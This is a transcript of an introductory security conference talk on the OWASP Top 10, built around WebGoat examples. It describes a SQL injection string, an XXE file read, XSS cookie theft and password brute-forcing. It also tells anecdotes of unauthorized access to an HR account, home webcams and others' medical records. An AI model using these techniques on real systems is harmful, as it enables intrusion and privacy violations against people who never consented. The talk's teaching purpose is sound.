Hacking the OWASP Top 10: An Intro to Web Application Security

since i don't see anybody complaining i'll assume you all can all right well this is uh welcome to hacking the owasp top 10 um also known as an introduction to application hacking um for those of you who don't know me here's you know sort of a bio if you will nothing particularly exciting on it um i will say this presentation is oriented for beginners um you know if you have a background in application hacking you could probably give this presentation better than i can um it's you know lots more information is available in the the reference notes is the end of the slide um i'm not going to go through everything here this is like i said just an introduction

kind of a you know wet your whistle if you will i do have discord up so if you want to type in questions as i'm talking feel free i'll keep an eye on it um now for some disclaimers of course we always have to have disclaimers in this on you know this presentation is my opinion only has nothing to do with uh my employer or anybody saying um each one of these slides i'm going to go through is a presentation itself i mean you know i talk about in the very first slide i talk about uh injections literally you could have a day class on that um so like i said this is just sort

of to uh get your feet wet i'm maybe using some terms in here that are unfamiliar to some of you especially if you are new to the industry or into application hacking most of these things are are discussed in the slides at the end but once again ask a question i'll see what i can do about answering it for those of you that are hoping to see dirty laundry from a company or from a website sorry you're not going to see any of that would not be responsible disclosure on my side but you will hear some stories um you're also only going to get pictures there's nothing live in here primarily because i tend to have really

bad success with live stuff um and like i said you don't have the time to sit down to sit and watch me type these things in in real life anyway i'm also not going to talk about how to avoid and fix these that's a completely different training presentation for that so with that if you are getting into this or interested in getting into this you might want to know well heck where do i start well there's hundreds of programming languages and millions of computer programs there's like billions of things with computer programs running on them so you've got plenty of things to aim at the other really good news is everything you need is already there

um like i have on the screen for this i just used a handful of real simple tools all of which you can download um now people have different opinions on this depending upon who you talk to some like cali some like parrots some like pentu some like windows again it doesn't really matter you can do this you know sort of application hacking with just about anything um get yourself some starting tools burp suite end map the owasp zed attack proxy there's metasploit welsh and again all these terms if they're unfamiliar to you you can take a look at the slides i'm happy to send them to whoever's interested all this information urls all that sort

of great stuff is also in this however probably the most important thing for a beginner to download and start playing with is a product or program called web goat um it's from oh wasp you're going to hear me talk a lot about oh wasp today it is a worldwide not-for-profit organization that basically does everything around application security they have their top ten lists which in this case is the top ten most frequently encountered web application security risks um they interviewed hundreds and hundreds of these and put together a list and that's the list that i'm going to use and show you how you can hack the most common vulnerabilities out there another way of looking at it is this is how you can

test your skills without being visited by the fbi which is usually a good thing again here's the information if you want to download it and run it yourself if you want to do application hacking you're going to need to learn some stuff you're going to need to learn programming languages and operating systems do you need to learn all this stuff at once no do you need even need to learn this stuff it's you can argue either way on this but i look at it as if you don't have a background in this sort of stuff it's just like not knowing how a computer works you can still hack it but knowing how a computer works how

networks are hooked up the protocols that go across it all this sort of stuff makes you a better hacker it gives you more capabilities and when it comes to programs you know if you know how the programming language works then you understand how the code works if you're familiar with a couple of frameworks you know how these programs and applications are cobbled together to make a system and yes they are cobbled together to make a system if you understand the protocols then you can kind of pick and choose you can see well ftp does things this way so maybe if i try it in this fashion over here i can get some information so you know the more you know the better

um so with that i will get into the actual most frequently encountered uh web security which is called an injection um now at the very beginning of all these slides i have my definition of that which in you know input that causes unexpected behavior o wasp uh has another much more wordy version of that uh if you're interested you can take a look at this but basically what this is is this is the equivalent of a username and password and you know i put in uh you know username of smith quote or equal equal one dash dash obviously that's not an employee dad i just put in a random text for the what they call the authentication tan

and when i did that it gave me a list of all the users in the in the database now this is not unique to web goat um i have done this effectively exact same thing in multiple applications and you know it gives me the entire uh user list you know it seems kind of odd why does that particular phrase smith quote or equal equal one dash dash you know dumped the database for me yep just like that um like i said this is called an injection attack and this is one of the reasons you need to understand how coding and protocols work because that's how you figure out how this sql injection attack works oh and by the way i'm sorry if you're a

no sequel sort of person you still have the same problems in a nosql database as well it's just a slightly different attack and it doesn't matter what version of sql you're using whether you're using microsoft's or you're using oracles or you're using you know postgres or my sequel they all have the same problem and what it really boils down to is um i'm hoping everybody can see my mouse here but the very first thing it has this you know funky looking thing and that's how programmers put stuff together they build things out of other pieces and when you get yourself your normal data you know it's you know where last name is smith and you know the authentication tan is that

number it goes out into the database and pulls that information and it just pulls a single one because you should only have one smith with that particular authorization but if you use this specially crafted uh phrase that i've been using um smith isn't that important you could use smith or sternberger or harry or ralph or whatever you want it's the last two pieces that are important the or one equal one tells the sql program or the database that everything is true and i'll explain why that's important here in a second the dash dash is a sql comment that just says ignore everything after the dash dash so you put that all together and what you end up with is

select everything from employees where everything is true so it gives you the entire list of the employees again this is why you have to know programming languages so can you understand how these quirks and stuff work now it's really easy to avoid these especially sql injection attacks pretty much every modern language that you could mention has ways around it has things you can do to prevent it so why is this one of the more common ones out there is it because developers are lazy is it because they're dumb well no that's actually not the reason you may occasionally find a developer out there who is unfamiliar with this doesn't know how to do it in their particular language

but the reason these things are so frequent has very little to do with the actual developer but we'll get into that later let's see okay

i'm being abused here on the discord channel anyway the second one is broken authentication um basically it's not properly validating the user one of my favorite areas of broken authentication are those security questions you know what's your mother's maiden name um what school did you go to stuff like that um because all you need is a little bit of os int and you can figure it out story time i was actually poking around on a school site it won't say which school either and i noticed that it had these security questions well i happen to know the email address of the hr person because i had actually applied for a job there and just out of curiosity i tried to log

in as her and it came up and had a couple of questions there you know like mother's maiden name what's your favorite color that sort of stuff and since i was kind of bored at the time i went over to facebook and i did a little research on this person and sure enough there was her mother and her mother's name and her mother's maiden name she had posts in there about what her favorite colors were stuff like that okay just out of curiosity i typed that in sure enough they the program let me in i had access to her account um because they set it up improperly even though she was only in hr she had admin privileges so i was able

to wander around on pretty much any computer i wanted to um this sort of made me nervous because i was just sort of doing this as a lark so i reached out to the school i let them know this sort of stuff but you know security questions are completely useless when it comes to authentication um the other one you run into is you know we all know passwords are bad passwords are easy ways to get in but sometimes it's hard to convince projects of this um so here's a little nmap command that does a brute force password attack you know against a particular machine and port um another story i had a project that um rejected my uh

claim that they needed to and he needed to enforce a password policy so i ran this and then you know demonstrated to them that out of the three or four thousand accounts they had there i could get into something like 500 of them because they used passwords like password one you know football team broncos that sort of stuff so they realized that was a good idea change their password policy then i ran it again and demonstrated to them that i could do a brute force attack and nobody would notice me because they didn't have any thresholds set up so then they did that so then i ran it a third time and demonstrated to them

why you needed to use multi-factor authentication because it didn't matter how good or how complex your passwords were if i used a particularly powerful enough machine i could you know spend the time figure out what the password was and get in that way so it took three times but eventually i convinced them that they needed to use multi-factor authentication the third one is sensitive data exposure this is basically showing things to the user or the hacker that you really shouldn't show them now what you're seeing here on the right well you got the login screen for web goat but on the right you're seeing the result of something called burp suite burp suite is probably one of the more

useful tools for application hacking and what burp suite does is it sort of gets between the user i.e the login page for web goat and the server in the back end and for those of you that are unfamiliar with the machine in the middle that's effectively what it looks like i'm intercepting what the web goat is sending to the server and what it's sending is this http post request there's lots of interesting information in here again if you do application hacking you'll figure you'll learn about all this stuff the important things are things like the session ids for the cookies um go up here the origin can be played with i have examples of that we actually

won't go through it today but it's at the end of the slide deck here where you can play with the origin header if you get a hold of the session cookie you can do replay attacks you can pretend to be somebody else um and do things under their account you know really neat things like that but the important thing here is you'll notice oops went a little too far there we are down here on the bottom username is web goat and the password is web goat in plain text they didn't even bother to encrypt it so that's you know an example of showing things that you really shouldn't be showing by the way if you happen to be using ftp

by default ftp sends passwords in plain text which is why you shouldn't be using ftp um xml external entities um i keep warning you you need to learn programming languages xml is one of them um although a lot of places use json now json also has weaknesses as well i just happen to be using xml here because it was easier so here is another web goat page and it's sort of like a a discord type channel and then over here if i type in junk i press submit this is what is sent from the client to the server and you'll notice you know it says it's xml it's got a comment the comments text you know looks fairly innocuous

the other thing you can do in burp suite which makes burp suite very useful is you can change it so what i did is i went in i stuck in this doctype user root system file thing and basically what it does is it runs this http command as a system uh instead of actually typing in the word junk because i took junk out now if you do this and then you continue sending it to the server what the server will happily give you is the root file system of the pro of the computer i'm actually running on because it didn't validate this xml information and far too many programs have that same problem as well

so that's one of those things that if you see it has xml on it you can you know try this sort of attack and see if it lets you in

okay i see any questions no still more hassling and i warned you at the very beginning i have squirrel moments and here is a squirrel moment i've been talking about application hacking you know and the thing that's important for you as the hacker is to figure out why you're doing it um you know packing quite frankly can be if you don't have permission to do it technically it's wrong illegal and dangerous there i've said it but the thing is is hacking can also be a good thing now i will freely admit in my uh adventures in hacking and i am by no means a professional hacker i am not a red teamer i'm probably closer to a blue

teamer i've seen interesting things ran into a place where they kept pictures people didn't actually realize their pictures were being copied and uploaded to this s3 bucket we'll just say there are people who take pictures of things that they really shouldn't be taking pictures of very disturbing and i i have been psychically scarred for life but probably my favorite story is a number of years ago when uh people started hacking video cameras i ran a showdown and i'll explain what showdown is in here a little bit and i just kind of poked around and i got to watch a video camera in russia where they were building something and that was kind of neat and

saw another video camera where they were you know there was as far as i could tell they were watching watching a trash can seemed a little weird to me why would you watch your trash can but you know whatever and then as i happened to find a video camera that was you know into somebody's house and i kind of i was able to rotate the camera and i was like oh i can wrote the camera this is neat and there was a couple sitting there and they were watching tv so i rotated the camera and i was watching tv spider-man 3 ironically enough with them and it occurred to me that's a little bit disturbing here i am

hacked into somebody's house watching their tv shows so yeah it can be a little bit interesting but on a more serious note frequently what i'll get is i'll get somebody will reach out to me or they'll go through you know the appropriate channels in the company and they'll say you know i broke into your web application here's the stupid stuff that you did kind of nanny nanny nanny sort of a thing that will not go over well now if you're a developer you've spent weeks months possibly even years working on these programs um you've devoted a lot of time and effort and having somebody you know basically do a nanny nanny i broke in you're not going to react well to that

and frankly that's even assuming you're even find out about it because when you go through some of these things you know you reach out to the security team or at least the email that has the security team in it you may not actually be reaching any of the developers this may go directly to the legal department and the legal department will send you a cease and desist message yes i have i've had a couple of them and it never even gets to the developers so you know you kind of have to be careful about this sort of stuff yeah you might find a vulnerability but that doesn't necessarily mean anyone's actually ever going to get to fix it

now if you're a defender out there why do i care about hacking as a defender you know other than the obvious thing somebody got in quite frankly if you don't know how they got in and you can't duplicate it how are you going to fix it so this is one reason that i tend to get really and i probably have talked longer on the subject than i needed to um i get really excited about the whole concept of red team do red team blue team do blue team because i think it's a a wasteful and and bad uh uh separation but you know sorry you're getting my opinions here what can i say but it boils down to one thing if you do

hack try not to do evil so back your regularly scheduled program the fifth one is broken access control basically what this means is the assumption is if the user is able to log in then that means the user can do anything well here's one way to check to see if that flaw is in a program so here we have a url and it happens to go to this particular sql injection page for web goat well i went in and i modified it to go to a different web page and it let me no problems at all so you might be asking yourself well this is web goat um you know you're supposed to be able to look at all these lessons what's

what's the big deal why would i care about being able to modify a url well what if the url was a medical system and it was doing something like showing you record patient records this actually is a real life example everything's been changed to protect the guilty and this is how the developers went and got uh my medical uh records i took a look at this and i noticed that my medical records were interestingly enough sequential um you know it was page number you know one two three four five the next one was one two three four five six and then it was you know so there was this nice sequential thing in there so

just out of curiosity i put in a number that didn't belong to me and sure enough i was able to pull up somebody else's medical records the other thing you can do with that information is if you notice it's sequential is you can put in a little loop because fetching these patient records takes time takes resources so you can quite easily overload a server doing this and have quite nice quite a nice little denial of service attack well i guess it's nice for you probably not so nice for the uh medical system and again this is one of those sorts of things that when i stumbled across it it was in my own medical records and you know i sent this

to the i actually happened to know who the developers were so i went directly to them and i said you know hey i ran across these sorts of things the simplest thing to do is don't use sequential page numbers oh sorry i'm not supposed to get into uh fixing this the next one is security misconfigurations i view this as it's when you lock the door but leave the window open cloud environments now i'm going to pick on aws here basically because the last job aws is what they used but azure has the problem google cloud has the same problems and a lot of it boils down to one not understanding your security configurations and then two you know your boss comes in

and says okay you need to migrate this up to the cloud you have two weeks to do it you know okay you're not really going to spend a whole lot of time figuring out how all this stuff works you're just going to try to get it up there as fast as possible so what we have here is it's an aws command line program and i'm telling it to look at all the s3 buckets and or excuse me uh use the s3 commands ls for those of you that are in linux know what ls is if you're not linux ls is the same thing as a directory listing and you know here's a bucket name and i actually tested this on my as aws

buckets and sure enough it came up and said okay here's everything in the bucket which is perfectly good because i had logged in as myself well then i tried in a couple of other buckets and i was able to take a look at those even though they were shall we say not my buckets and it came back and said okay here's the name of the bucket here's the files on it here's the size there's actually a lot more information that comes back with this that i'm not putting in here well okay i'm suspect that you know joe company probably didn't want me to take a look at their s3 buckets um what is it that they did wrong now

the typical thing is there is a user uh excuse me a uh role there we are a role called authenticated user most developers look at this and say oh authenticated user means that somebody's logged into my into our aws account and they're an authenticated user for our aws account well that's not what that means what that means is i have logged in as an a double aws user not for the company but any aws this is a fairly common one most of the time you get an authenticated user you do start listing bucket names and in the documentation are in the notes here i have some ways of getting bucket names if you don't happen to know

it and you can pull all this information out and it's because things were misconfigured the developer didn't have the time to figure it out and quite frankly the aws documentation while it's very voluminous is not particularly good in some situations and describing this was one of them cross-site scripting this is another really fun one that you as an application security hacker can you know just have way too much entertainment with you'll notice that there is a little pop up here that says fred okay that's very exciting you go down a little further and you see i put in this javascript command script alert script into an actual entry field um the entry field is supposed to be a

series of numbers obviously the field wasn't being validated but why the heck did it run the javascript code well that's because what this is is this code is sent to excuse me this code is sent to the browser the browser is what actually invokes this command not the server and not the client so it sort of steps outside of the client server boundary if you will and actually executes the java code now there's three different types of cross-site scripting there's reflected which is what this is they're stored and there's dom document object model again more information in the slide decks which we won't go over today now of course as an attacker you're not going to use alert

you're going to dig through the html form and you're going to look for something like this where they're putting parameters directly into a value then you're going to modify that parameter and you might do something like um you know document cookie uh and so you do that and that information gets sent back to your website and you have the cookie that's part of the web page you know why why is that useful and again session ids are used in replay attacks you can um log in using a cookie you can log in and pretend to be somebody else one of the common things that cross-site scripting is used for are like on pages where you buy things shopping

carts stuff like that you get somebody's session id and you basically can be them you can purchase stuff under their account you can use their credit card and they won't know us a thing about it until they get a bill um so you know cross-site scripting is one of the more dangerous ones out there because uh you can literally do anything in the uh uh script that you can do in javascript and since javascript is an entire program you have access to literally an entire programming language where you can run anything you want uh insecure deserialization that sounds like a really impressive one um basically what it is is serialization is the process of taking

an object in memory as the program is running and you save it onto disk it's sort of like taking a snapshot of the program you can think of it that way and then later on the program will load up that snapshot and take off from where you left where it was left off a great time saver um useful for things like um you know i want to you know stop the app the program here and then get come back to it at a later date i wanted to pick up wherever i left off so very typical use case and but the problem is is you can go in and you can change that binary data there's one example

here how you can change it in a java program i won't step through how this java program works but what it ends up doing is it's a very nasty denial of service because this is in effect an infinite loop so your program will happily try to read this it will continue reading it will use up all memory it will probably you know start writing stuff to disk possibly use upping using everything up on your disk which is not good in a linux system to say the least you know so horribly bad things happen we'll just put it that way well for those of you that are programmers you may be looking at this and go

ah nobody uses java java is a bad code we don't use java we'll use something safe like yaml well bad news you can do the same thing with the ammo just as a side note you'll see most of the time that i might pick on a particular language whether it's java or sql or pretty much anything out there all languages have these issues i don't care whether you're using python or ruby or assembly or c or you know insert language here they all have their issues different issues but they all have issues so the fact that i have an example here in java is solely because that's what i happen to have given enough time i could come up with

one in you know pick your language so like i said here's the here's your safe language ammo you can do the same thing the problem with this particular yaml code is this thing here load load will take whatever as it's told to and happily load and run it a year maybe two years ago yaml realized that was probably a bad thing and they changed it to yaml or safe underscore yaml which is what you're supposed to be using that's great so anyone that's aware of that who's writing new code probably is immune to this however um there's thousands if not millions of lines of yaml code out there that hasn't been updated hasn't been fixed

and suffers from this exact same problem if you think back to one of the earlier screens i had as an application hacker you have more real estate that you can go after then um you can possibly imagine and i have even gotten into the whole iot thing and the fact that iot tends to use very old and very antiquated code doesn't keep it up to date so yeah there's just so much to aim for in the application security field um you could easily spend your life and only you know hit just a small portion of it as a side note these deserializations are also frequently used by cryptominers because what they'll do is they'll sort

of add their binary code to the end of the deserialization code so your stuff comes up runs perfectly you don't notice anything because it acts just like it is supposed to but in the background um a thread or another process has been started up and it's happily doing crypto mining so you know that's something you have to also be careful about and again in the slide deck i have some examples of where that has been used before using components with known vulnerabilities i sort of alluded to this in a previous in some previous discussions but uh the things don't get changed frequently in the programming world or they get changed very frequently in the programming world sort of depends on

which side you're looking at you know we're all familiar with open source as a developer open source is great i can get this open source i can you know save myself all sorts of time and effort and you know get things done at a faster rate now just as to give you an idea of the scope of this concept of open source um i got a little uh blurb here a company called blackduck which scans open source components and stuff they looked at 1100 commercial code bases this was back in 2017 so you know that's three four years old now and they discovered that 96 of the applications they scanned had open source components and

of those 96 percent the average was 257 components or pieces of open source for each application so just sort of think of that from a scope standpoint 96 of the programs you run into have 250 uh open source components i can pretty much guarantee you the 250 open source components are not kept up to date some of them will have vulnerabilities in them some are no longer maintained some of them the developers have gone on to bigger and better things so you know it's just code that's been out there i mean i've seen code as old as you know the 90s that's still running inside of uh programs again a a great um a big area for you to attack

um a great example of not keeping things up to date is the whole equifax mess um i'm sure there are i'm sure most everybody here is familiar with equifax just in case you're not it happened in 2017 um and because they were using apache struts and there was a particular a vulnerability out there that you know they didn't get patched somebody or someone or china or you know take your pick who you think it was they got the private records for 148 million americans 15 million british citizens and 19 000 canadian citizens uh quite the impact to say the least and this was because uh somebody didn't keep their apache struts up to date now there's lots of

discussions as to whose fault it was and all this sort of thing which we're not going to get into here this is just an example to show you that you know even in the biggest of companies things don't get kept up to date now you know if you've heard of the heartbleed vulnerability this was what maybe three four five years ago something like that it was a very nasty vulnerability actually that was found in some open source code known as open sql or sorry openssl five years later six years later um if you run this showden's list of devices you'll find a bunch of them that are still vulnerable to heartbleed now for those of you that are unfamiliar

unfamiliar with showdown it's a search engine that basically goes out and scans webcams routers servers programs everything and you can search uh for various things in this one in specific it's searching for heartbleed vulnerabilities you can say search for web cameras in the us that are made by you know a chinese company so you know you can get very specific and it'll give you a list of all this stuff um now again i sort of talked about this a little earlier and a lot of people take a look at or hear these sorts of things and i think well the problem is lazy developers developers aren't aren't keeping things up to date you know it's all the

developers fault well i'm a developer i sort of take offense at that but in reality even updating something like apache struts which is a fairly well-known application let's say you find that the uh an application that you're or open source component that you're using is no longer maintained somebody has to write it um you know let's say you do update you do keep everything up to date it's not unusual that you will update something to a new version and your program stops working your program breaks so then you have to stop your development you have to stop getting things done in order to fix it the example i've used before when describing this to people that think it's all

programmers fault is what which how would you react if you got a message saying okay the light went out on your refrigerator so we've turned your refrigerator off until a manufacturer ships us a replacement part should come in the next couple of weeks or maybe you might have to buy another refrigerator yeah that's pretty much the same thing as going to a company and saying you know you have this code that needs to be updated so you should stop everything you're doing and update it it just doesn't work in the real world um is this a problem yes is it something that needs to be addressed yes is it something i have a solution for and i'm going to tell you about

right now no because unfortunately it's a common issue but the key thing here is that i'm trying to in in my poor way to point out here is this isn't a blame game you know because you found a problem in a program doesn't mean the program's bad it doesn't mean that the development you know group is lazy what it means is that this sort of stuff needs to be given to the developers and the architects so that they can come up with a good way or a clean way of updating and fixing their program so with that public service message we'll continue on here this is probably my all-time favorite picture i don't know how well it's going to come

across on the twitch screen since i don't have twitch up and running at this point but if you look down at the very bottom of this picture you'll see that there's a pair of shoes here and if you look real carefully you'll see somebody is wearing some sort of clothes or a cloak that lets them almost perfectly blend in with the background this is what you as an application hacker really want to do as well you want to blend into the program you want to blend into the system um and this is an area that developers tend to overlook you know they'll write logs they'll write monitoring stuff but they won't necessarily make them or protect them so you can get in and

you can you know delete the fact that you got into the system um you can find some interesting information i've seen logs where passwords were put in um just as part of the normal you know development process because the developer wanted to be able to reproduce an error if it happened you can see session ids a lot of times a developer will simply dump the contents of an http request which will include session ids and you know as you know you saw earlier that with the open goat it might even have a unencrypted passwords and stuff like that okay i'm doing this for a good purpose why would i want to disguise myself well part of the reason that you're

disguising yourself is to make sure that the uh monitoring software can catch you um you know they say that the typical time to detect a breach is 200 days that's scary to say the least so you sort of want to when you're helping out a team when you're doing your your penetration testing when you're doing your red team engagement when you as a developer are poking around you know testing out your program or if your security guy you know helping out the development team you want to try to get that monitoring that detection down as quick as possible you know just imagine what a professional malware hacker can do in 200 days um so that's sort of the interesting

thing with that one and that's where logs can be very important because these logs are absorbed and read in by security operations centers by monitoring programs they're evaluated by machine learning and all this sort of stuff and they're supposed to catch this sort of stuff i can't even begin to tell you how many programs i've done pseudo-penetration tests on even just the brute force stuff like that example i had earlier in the presentation where i was doing brute force attacks i was literally sending thousands and thousands of password requests um you know a minute and or a second and no alarms were going off you know that's an indication that i'm sorry something wrong with set up in your system

those sorts of quite obvious red team efforts should be caught immediately but frequently they aren't so any rate um that is pretty much my time i'm actually on time which is very unusual for me so you know this is time for question and answers if you've got any um here's some information if you want to reach out to me like i said i'm happy to send the slide deck which has got a lot more information in it if you want to reach out and ask me questions that's fine too and with that i will turn it over to the moderator

okay thank you very much greg so as you said if you have any uh questions you can jump in the discord uh check the b-sides denver twitter for all the links throughout the day we're using different discords for different speakers just for you know isolation keep one of these hooligans away from the other that kind of thing we've got about 15 minutes uh it's quite a bit of time plenty for questions they don't have to be about the talk you can also ask them other inappropriate questions or you can ask uh telecon you know tales from back in the day uh which goes back quite a ways i mean really yeah respond to a couple of these things

here um and no it's not ask for forgiveness instead of permission um let's see here now somebody else when we were talking about security questions they made a very um you know very good comment here about you don't actually have to answer the security questions correctly um you know the the you know company isn't going to go out and make sure that you use the correct mother's maiden name so a lot of people will just stick in random information there um that's certainly a one way of handling those security questions um if you type in you know 45 characters of random garbage chances are i'm not going to figure that out very well i have however seen situations where

they will actually do basically brute force guessing on some of this stuff i wouldn't be surprised if at some point they're going to start you know just doing random characters sort of like password spraying if you will um i suspect that most of those question and or security questions aren't well monitored so would not surprise me if people start doing that sort of stuff because like i said i doubt they're monitored i doubt there is any thresholds associated with them um but you know that's actually a very good way to handle the security questions is don't put in the real answers um let's see here um looking through yeah a lot of hassling on this okay

i think those were all the ah there's a question at the end there for you if i had everything to do over again what would i do differently from a programming standpoint um that's actually a very good question um

it's hard to say um you know one of the examples i've used is you know decades ago when i wrote programs i wrote programs that had sql injection attacks in them and as a matter of fact you know some of the code that i showed in that page there or in that slide there looked exactly like code i wrote you know 20 some years ago that's part of the problem with the whole development cycle and it's even worse for things like shuttle you know code that you know is runs on the shuttle or code that's you know in an embedded system because you know you write these sort of things and you may write it

as you know secure and as tightly as is possible for the time um but you know you put it into your your chip you take your chip you stick it into a car you embed it in your microwave and two days later somebody figures out a way around it you know they figure out that one equals one you know that can be stuck in there so now all of a sudden your code is vulnerable well what do you do i mean you can't wander around to everybody's microwave and replace their chip um if it's an embedded device you usually can't update it um you know so what do you do this this is a common

problem in the development arena and there's no good answer for it you hear some people talking about how well 5g will solve those because your microwave can now be connected to the internet um ignoring all the conspiracy theories with 5g at this point well if you connect it to the internet you have all sorts of other issues on when one of the chris's talks later today you can always ask about the dancing roombas which is one of my favorite stories um because if you connect something to the internet that wasn't originally connected to the internet i can almost guarantee you it wasn't written securely so yeah you can connect all the stuff to the internet and now all of a sudden you

have trillions of programs that are all vulnerable so that's not a good solution either um let's see here uh actually i don't actually know of any good books or online actually no i take that back the best online reference i can't think of any books off the top of my head but the best online reference would be o wasp.org they probably even have books there it is a great place to learn everything there is to know about application security whether hacking it whether defending it um really that that's the place i would start um once you do that then it's just a matter of learning various you know things involving with programs um html and javascript

are are great places to start to learn things about you know how your web systems work how your application programs work oodles of online examples i've got some of them in the slide deck as well um w3c schools is a great place to learn um there's hundreds of youtube videos out there that basically go into that you know they step through web goat for example here's how you break into the web goat stuff there's app things out there they'll teach you all sorts of programming code i mean at this point you probably don't even need books anymore you can probably just do it all online um let's see next question um that's actually a very good one which is

which is more rewarding attacking software or protecting software um i'd say it's a faster thrill to attack software but it's probably more of a satisfying thrill to keep them out but that's me personally some people prefer the hacking to the the protecting some people for protecting the hacking i like to do both oh let's see here um yep good point there doug sands has some great resources as well um you know but yeah like i said sans oh wasp those are probably your top things to learn about all things application and like i said you just go into youtube search for application hacking um web web attacks stuff like that and there are people there who are literally

typing it in and you can watch them do it um you know great place to learn all that sort of stuff like i said at best this was just sort of designed to pique your interest but there are plenty of resources out there um let's see here um yeah well for for those who are thinking um i will say that i started my career uh my official career as a coder you know i have done programming and coding for an extremely long time and i sort of learned security um sort of by accident it was one of those sorts of things where um you know it's like well what if somebody does this or you know why isn't there a username

password around this or why are you sending it in you know plain text and that just sort of naturally led into the whole security arena now if you go far enough back i actually technically started my career as uh hacking uh i'll give you an idea of my age you're hacking floppy disks on an apple ii so that kind of gives you an idea just how old i am here but that sounds familiar by the way greg five-minute warning ah five-minute warning okey-dokey um so and frankly a diverse background helps a lot when it comes to hacking if all you do is think like a programmer you'll fall into the same uh mindset that programmers do

so yeah if you come from a religious background you come from an embedded background you come from networking i mean heck you come in as a teacher you will see things in a different light than the developer did and frankly that's great because you will see things that the developers will miss um so with that um yep the humble bumble uh book books are a great place to get that sort of stuff as well um and with that i think i've hit all the questions that are coming in at this point we'll be monitoring the discord channel so if you want to type in something afterwards that's fine too and with that ibfini